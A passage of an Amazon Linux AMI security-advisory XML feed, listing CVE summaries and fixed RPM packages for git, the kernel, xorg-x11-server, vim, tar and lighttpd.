</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41860" title="" id="CVE-2022-41860" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="freeradius-ldap" version="2.2.6" release="7.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-ldap-2.2.6-7.17.amzn1.x86_64.rpm</filename></package><package name="freeradius-mysql" version="2.2.6" release="7.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-mysql-2.2.6-7.17.amzn1.x86_64.rpm</filename></package><package name="freeradius-krb5" version="2.2.6" release="7.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-krb5-2.2.6-7.17.amzn1.x86_64.rpm</filename></package><package name="freeradius-unixODBC" version="2.2.6" release="7.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-unixODBC-2.2.6-7.17.amzn1.x86_64.rpm</filename></package><package name="freeradius-postgresql" version="2.2.6" release="7.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-postgresql-2.2.6-7.17.amzn1.x86_64.rpm</filename></package><package name="freeradius-perl" version="2.2.6" release="7.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-perl-2.2.6-7.17.amzn1.x86_64.rpm</filename></package><package name="freeradius" version="2.2.6" release="7.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-2.2.6-7.17.amzn1.x86_64.rpm</filename></package><package name="freeradius-python" version="2.2.6" release="7.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-python-2.2.6-7.17.amzn1.x86_64.rpm</filename></package><package name="freeradius-debuginfo" version="2.2.6" release="7.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-debuginfo-2.2.6-7.17.amzn1.x86_64.rpm</filename></package><package name="freeradius-utils" version="2.2.6" release="7.17.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/freeradius-utils-2.2.6-7.17.amzn1.x86_64.rpm</filename></package><package name="freeradius-debuginfo" version="2.2.6" release="7.17.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-debuginfo-2.2.6-7.17.amzn1.i686.rpm</filename></package><package name="freeradius" version="2.2.6" release="7.17.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-2.2.6-7.17.amzn1.i686.rpm</filename></package><package name="freeradius-utils" version="2.2.6" release="7.17.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-utils-2.2.6-7.17.amzn1.i686.rpm</filename></package><package name="freeradius-python" version="2.2.6" release="7.17.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-python-2.2.6-7.17.amzn1.i686.rpm</filename></package><package name="freeradius-krb5" version="2.2.6" release="7.17.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-krb5-2.2.6-7.17.amzn1.i686.rpm</filename></package><package name="freeradius-perl" version="2.2.6" release="7.17.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-perl-2.2.6-7.17.amzn1.i686.rpm</filename></package><package name="freeradius-postgresql" version="2.2.6" release="7.17.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-postgresql-2.2.6-7.17.amzn1.i686.rpm</filename></package><package name="freeradius-unixODBC" version="2.2.6" release="7.17.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-unixODBC-2.2.6-7.17.amzn1.i686.rpm</filename></package><package name="freeradius-mysql" version="2.2.6" release="7.17.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-mysql-2.2.6-7.17.amzn1.i686.rpm</filename></package><package name="freeradius-ldap" version="2.2.6" release="7.17.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-ldap-2.2.6-7.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2023-1700</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1700: medium priority package update for git</title><issued date="2023-03-02 20:22:00" /><updated date="2023-03-07 01:55:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-23946:
Git, a revision control system, is vulnerable to path traversal prior to versions 2.39.2, 2.38.4, 2.37.6, 2.36.5, 2.35.7, 2.34.7, 2.33.7, 2.32.6, 2.31.7, and 2.30.8. By feeding a crafted input to `git apply`, a path outside the working tree can be overwritten as the user who is running `git apply`. A fix has been prepared and will appear in v2.39.2, v2.38.4, v2.37.6, v2.36.5, v2.35.7, v2.34.7, v2.33.7, v2.32.6, v2.31.7, and v2.30.8. As a workaround, use `git apply --stat` to inspect a patch before applying; avoid applying one that creates a symbolic link and then creates a file beyond the symbolic link.
CVE-2023-22490:
Git is a revision control system. Using a specially-crafted repository, Git prior to versions 2.39.2, 2.38.4, 2.37.6, 2.36.5, 2.35.7, 2.34.7, 2.33.7, 2.32.6, 2.31.7, and 2.30.8 can be tricked into using its local clone optimization even when using a non-local transport. Though Git will abort local clones whose source `$GIT_DIR/objects` directory contains symbolic links, the `objects` directory itself may still be a symbolic link. These two may be combined to include arbitrary files based on known paths on the victim's filesystem within the malicious repository's working copy, allowing for data exfiltration in a similar manner as CVE-2022-39253. A fix has been prepared and will appear in v2.39.2, v2.38.4, v2.37.6, v2.36.5, v2.35.7, v2.34.7, v2.33.7, v2.32.6, v2.31.7, and v2.30.8. If upgrading is impractical, two short-term workarounds are available. Avoid cloning repositories from untrusted sources with `--recurse-submodules`. Instead, consider cloning repositories without recursively cloning their submodules, and instead run `git submodule update` at each layer. Before doing so, inspect each new `.gitmodules` file to ensure that it does not contain suspicious module URLs.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22490" title="" id="CVE-2023-22490" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23946" title="" id="CVE-2023-23946" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="git-daemon" version="2.38.4" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.38.4-1.80.amzn1.x86_64.rpm</filename></package><package name="git-instaweb" version="2.38.4" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-instaweb-2.38.4-1.80.amzn1.x86_64.rpm</filename></package><package name="git-hg" version="2.38.4" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.38.4-1.80.amzn1.noarch.rpm</filename></package><package name="emacs-git-el" version="2.38.4" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.38.4-1.80.amzn1.noarch.rpm</filename></package><package name="git-core" version="2.38.4" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-core-2.38.4-1.80.amzn1.x86_64.rpm</filename></package><package name="perl-Git-SVN" version="2.38.4" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.38.4-1.80.amzn1.noarch.rpm</filename></package><package name="git-cvs" version="2.38.4" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.38.4-1.80.amzn1.noarch.rpm</filename></package><package name="git-email" version="2.38.4" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/git-email-2.38.4-1.80.amzn1.noarch.rpm</filename></package><package name="git-subtree" version="2.38.4" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-subtree-2.38.4-1.80.amzn1.x86_64.rpm</filename></package><package name="gitweb" version="2.38.4" release="1.80.amzn1" epoch="0" 
arch="noarch"><filename>Packages/gitweb-2.38.4-1.80.amzn1.noarch.rpm</filename></package><package name="emacs-git" version="2.38.4" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.38.4-1.80.amzn1.noarch.rpm</filename></package><package name="git-debuginfo" version="2.38.4" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.38.4-1.80.amzn1.x86_64.rpm</filename></package><package name="git-bzr" version="2.38.4" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.38.4-1.80.amzn1.noarch.rpm</filename></package><package name="git-svn" version="2.38.4" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.38.4-1.80.amzn1.x86_64.rpm</filename></package><package name="git" version="2.38.4" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.38.4-1.80.amzn1.x86_64.rpm</filename></package><package name="git-core-doc" version="2.38.4" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/git-core-doc-2.38.4-1.80.amzn1.noarch.rpm</filename></package><package name="git-all" version="2.38.4" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.38.4-1.80.amzn1.noarch.rpm</filename></package><package name="perl-Git" version="2.38.4" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.38.4-1.80.amzn1.noarch.rpm</filename></package><package name="git-p4" version="2.38.4" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.38.4-1.80.amzn1.noarch.rpm</filename></package><package name="git-instaweb" version="2.38.4" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/git-instaweb-2.38.4-1.80.amzn1.i686.rpm</filename></package><package name="git-svn" version="2.38.4" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/git-svn-2.38.4-1.80.amzn1.i686.rpm</filename></package><package name="git-core" version="2.38.4" release="1.80.amzn1" epoch="0" 
arch="i686"><filename>Packages/git-core-2.38.4-1.80.amzn1.i686.rpm</filename></package><package name="git" version="2.38.4" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/git-2.38.4-1.80.amzn1.i686.rpm</filename></package><package name="git-daemon" version="2.38.4" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.38.4-1.80.amzn1.i686.rpm</filename></package><package name="git-debuginfo" version="2.38.4" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.38.4-1.80.amzn1.i686.rpm</filename></package><package name="git-subtree" version="2.38.4" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/git-subtree-2.38.4-1.80.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1701</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1701: important priority package update for kernel</title><issued date="2023-03-17 15:53:00" /><updated date="2025-04-23 22:37:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-7192:
kernel: refcount leak in ctnetlink_create_conntrack()
CVE-2023-52974:
In the Linux kernel, the following vulnerability has been resolved:
scsi: iscsi_tcp: Fix UAF during login when accessing the shost ipaddress
CVE-2023-45862:
An issue was discovered in drivers/usb/storage/ene_ub6250.c for the ENE UB6250 reader driver in the Linux kernel before 6.2.5. An object could potentially extend beyond the end of an allocation.
CVE-2023-2985:
A use-after-free flaw was found in hfsplus_put_super in fs/hfsplus/super.c in the Linux Kernel. This flaw could allow a local user to cause a denial of service.
CVE-2023-26545:
In the Linux kernel before 6.1.13, there is a double free in net/mpls/af_mpls.c upon an allocation failure (for registering the sysctl table under a new location) during the renaming of a device.
CVE-2023-2162:
A use-after-free flaw was found in iscsi_sw_tcp_session_create in drivers/scsi/iscsi_tcp.c in the SCSI sub-component in the Linux Kernel. This issue could allow an attacker to leak kernel internal information.
CVE-2023-1998:
When plain IBRS is enabled (not enhanced IBRS), the logic in spectre_v2_user_select_mitigation() determines that STIBP is not needed. The IBRS bit implicitly protects against cross-thread branch target injection. However, with legacy IBRS, the IBRS bit is cleared on returning to userspace for performance reasons, which leaves userspace threads vulnerable to cross-thread branch target injection against which STIBP protects.
CVE-2023-1829:
A use-after-free vulnerability in the Linux Kernel traffic control index filter (tcindex) can be exploited to achieve local privilege escalation. The tcindex_delete function does not properly deactivate filters in the case of perfect hashes while deleting the underlying structure, which can later lead to double freeing the structure. A local attacker user can use this vulnerability to elevate its privileges to root.
We recommend upgrading past commit 8c710f75256bb3cf05ac7b1672c82b92c43f3d28.
CVE-2023-1281:
Use After Free vulnerability in Linux kernel traffic control index filter (tcindex) allows Privilege Escalation. The imperfect hash area can be updated while packets are traversing, which will cause a use-after-free when 'tcf_exts_exec()' is called with the destroyed tcf_ext. A local attacker user can use this vulnerability to elevate its privileges to root.
This issue affects Linux Kernel: from 4.14 before git commit ee059170b1f7e94e55fa6cadee544e176a6e59c2.
CVE-2023-0458:
Detected a few exploitable gadgets that could leak secret memory through a side-channel such as MDS as well as insufficient hardening of the usercopy functions against spectre-v1.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0458" title="" id="CVE-2023-0458" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1281" title="" id="CVE-2023-1281" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1829" title="" id="CVE-2023-1829" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1998" title="" id="CVE-2023-1998" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2162" title="" id="CVE-2023-2162" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26545" title="" id="CVE-2023-26545" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2985" title="" id="CVE-2023-2985" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45862" title="" id="CVE-2023-45862" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52974" title="" id="CVE-2023-52974" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7192" title="" id="CVE-2023-7192" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.14.309" release="159.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.309-159.529.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.309" release="159.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.309-159.529.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.309" release="159.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.309-159.529.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.309" release="159.529.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-headers-4.14.309-159.529.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.309" release="159.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.309-159.529.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.309" release="159.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.309-159.529.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.309" release="159.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.309-159.529.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.309" release="159.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.309-159.529.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.309" release="159.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.309-159.529.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.309" release="159.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.309-159.529.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.309" release="159.529.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.309-159.529.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.309" release="159.529.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.309-159.529.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.309" release="159.529.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.309-159.529.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.309" release="159.529.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.309-159.529.amzn1.i686.rpm</filename></package><package name="kernel-tools" 
version="4.14.309" release="159.529.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.309-159.529.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.309" release="159.529.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.309-159.529.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.309" release="159.529.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.309-159.529.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.309" release="159.529.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.309-159.529.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.309" release="159.529.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.309-159.529.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.309" release="159.529.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.309-159.529.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1702</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1702: important priority package update for xorg-x11-server</title><issued date="2023-03-17 15:53:00" /><updated date="2023-03-22 18:51:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-0494:
A vulnerability was found in X.Org. This issue occurs due to a dangling pointer in DeepCopyPointerClasses that can be exploited by ProcXkbSetDeviceInfo() and ProcXkbGetDeviceInfo() to read and write into freed memory. This can lead to local privilege elevation on systems where the X server runs privileged and remote code execution for ssh X forwarding sessions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0494" title="" id="CVE-2023-0494" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xorg-x11-server-Xnest" version="1.17.4" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.51.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-source" version="1.17.4" release="18.51.amzn1" epoch="0" arch="noarch"><filename>Packages/xorg-x11-server-source-1.17.4-18.51.amzn1.noarch.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.17.4" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.51.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.51.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-common" version="1.17.4" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-common-1.17.4-18.51.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.17.4" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.51.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.51.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-devel" version="1.17.4" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-devel-1.17.4-18.51.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.17.4" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.51.amzn1.x86_64.rpm</filename></package><package 
name="xorg-x11-server-common" version="1.17.4" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-common-1.17.4-18.51.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.17.4" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.51.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.17.4" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.51.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.17.4" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.51.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.51.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.51.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-devel" version="1.17.4" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-devel-1.17.4-18.51.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.17.4" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.51.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1703</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1703: important priority package update for vim</title><issued date="2023-03-17 15:53:00" /><updated date="2023-03-22 18:51:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-1127:
Divide By Zero in GitHub repository vim/vim prior to 9.0.1367.
CVE-2023-0512:
Divide By Zero in GitHub repository vim/vim prior to 9.0.1247.
CVE-2023-0433:
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.1225.
CVE-2023-0288:
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.1189.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0288" title="" id="CVE-2023-0288" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0433" title="" id="CVE-2023-0433" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0512" title="" id="CVE-2023-0512" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1127" title="" id="CVE-2023-1127" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-enhanced" version="9.0.1367" release="1.73.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-9.0.1367-1.73.amzn1.x86_64.rpm</filename></package><package name="vim-data" version="9.0.1367" release="1.73.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-data-9.0.1367-1.73.amzn1.noarch.rpm</filename></package><package name="vim-filesystem" version="9.0.1367" release="1.73.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-filesystem-9.0.1367-1.73.amzn1.noarch.rpm</filename></package><package name="vim-minimal" version="9.0.1367" release="1.73.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-9.0.1367-1.73.amzn1.x86_64.rpm</filename></package><package name="vim-debuginfo" version="9.0.1367" release="1.73.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-9.0.1367-1.73.amzn1.x86_64.rpm</filename></package><package name="vim-common" version="9.0.1367" release="1.73.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-9.0.1367-1.73.amzn1.x86_64.rpm</filename></package><package name="vim-enhanced" version="9.0.1367" release="1.73.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-9.0.1367-1.73.amzn1.i686.rpm</filename></package><package name="vim-minimal" version="9.0.1367" release="1.73.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-9.0.1367-1.73.amzn1.i686.rpm</filename></package><package 
name="vim-common" version="9.0.1367" release="1.73.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-9.0.1367-1.73.amzn1.i686.rpm</filename></package><package name="vim-debuginfo" version="9.0.1367" release="1.73.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-9.0.1367-1.73.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1704</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1704: important priority package update for tar</title><issued date="2023-03-17 15:53:00" /><updated date="2023-03-22 18:51:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-48303:
GNU Tar through 1.34 has a one-byte out-of-bounds read that results in use of uninitialized memory for a conditional jump. Exploitation to change the flow of control has not been demonstrated. The issue occurs in from_header in list.c via a V7 archive in which mtime has approximately 11 whitespace characters.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303" title="" id="CVE-2022-48303" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tar" version="1.26" release="31.23.amzn1" epoch="2" arch="x86_64"><filename>Packages/tar-1.26-31.23.amzn1.x86_64.rpm</filename></package><package name="tar-debuginfo" version="1.26" release="31.23.amzn1" epoch="2" arch="x86_64"><filename>Packages/tar-debuginfo-1.26-31.23.amzn1.x86_64.rpm</filename></package><package name="tar" version="1.26" release="31.23.amzn1" epoch="2" arch="i686"><filename>Packages/tar-1.26-31.23.amzn1.i686.rpm</filename></package><package name="tar-debuginfo" version="1.26" release="31.23.amzn1" epoch="2" arch="i686"><filename>Packages/tar-debuginfo-1.26-31.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1705</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1705: important priority package update for lighttpd</title><issued date="2023-03-17 15:53:00" /><updated date="2023-03-22 18:51:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-37797:
In lighttpd 1.4.65, mod_wstunnel does not initialize a handler function pointer if an invalid HTTP request (websocket handshake) is received. This leads to a null pointer dereference which crashes the server. It could be used by an external attacker to cause a denial of service condition.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37797" title="" id="CVE-2022-37797" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="lighttpd-fastcgi" version="1.4.53" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-fastcgi-1.4.53-1.37.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_authn_mysql" version="1.4.53" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_authn_mysql-1.4.53-1.37.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_geoip" version="1.4.53" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_geoip-1.4.53-1.37.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_authn_gssapi" version="1.4.53" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_authn_gssapi-1.4.53-1.37.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_authn_pam" version="1.4.53" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_authn_pam-1.4.53-1.37.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_mysql_vhost" version="1.4.53" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_mysql_vhost-1.4.53-1.37.amzn1.x86_64.rpm</filename></package><package name="lighttpd-debuginfo" version="1.4.53" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-debuginfo-1.4.53-1.37.amzn1.x86_64.rpm</filename></package><package name="lighttpd" version="1.4.53" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-1.4.53-1.37.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_authn_gssapi" version="1.4.53" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_authn_gssapi-1.4.53-1.37.amzn1.i686.rpm</filename></package><package name="lighttpd-debuginfo" version="1.4.53" release="1.37.amzn1" 
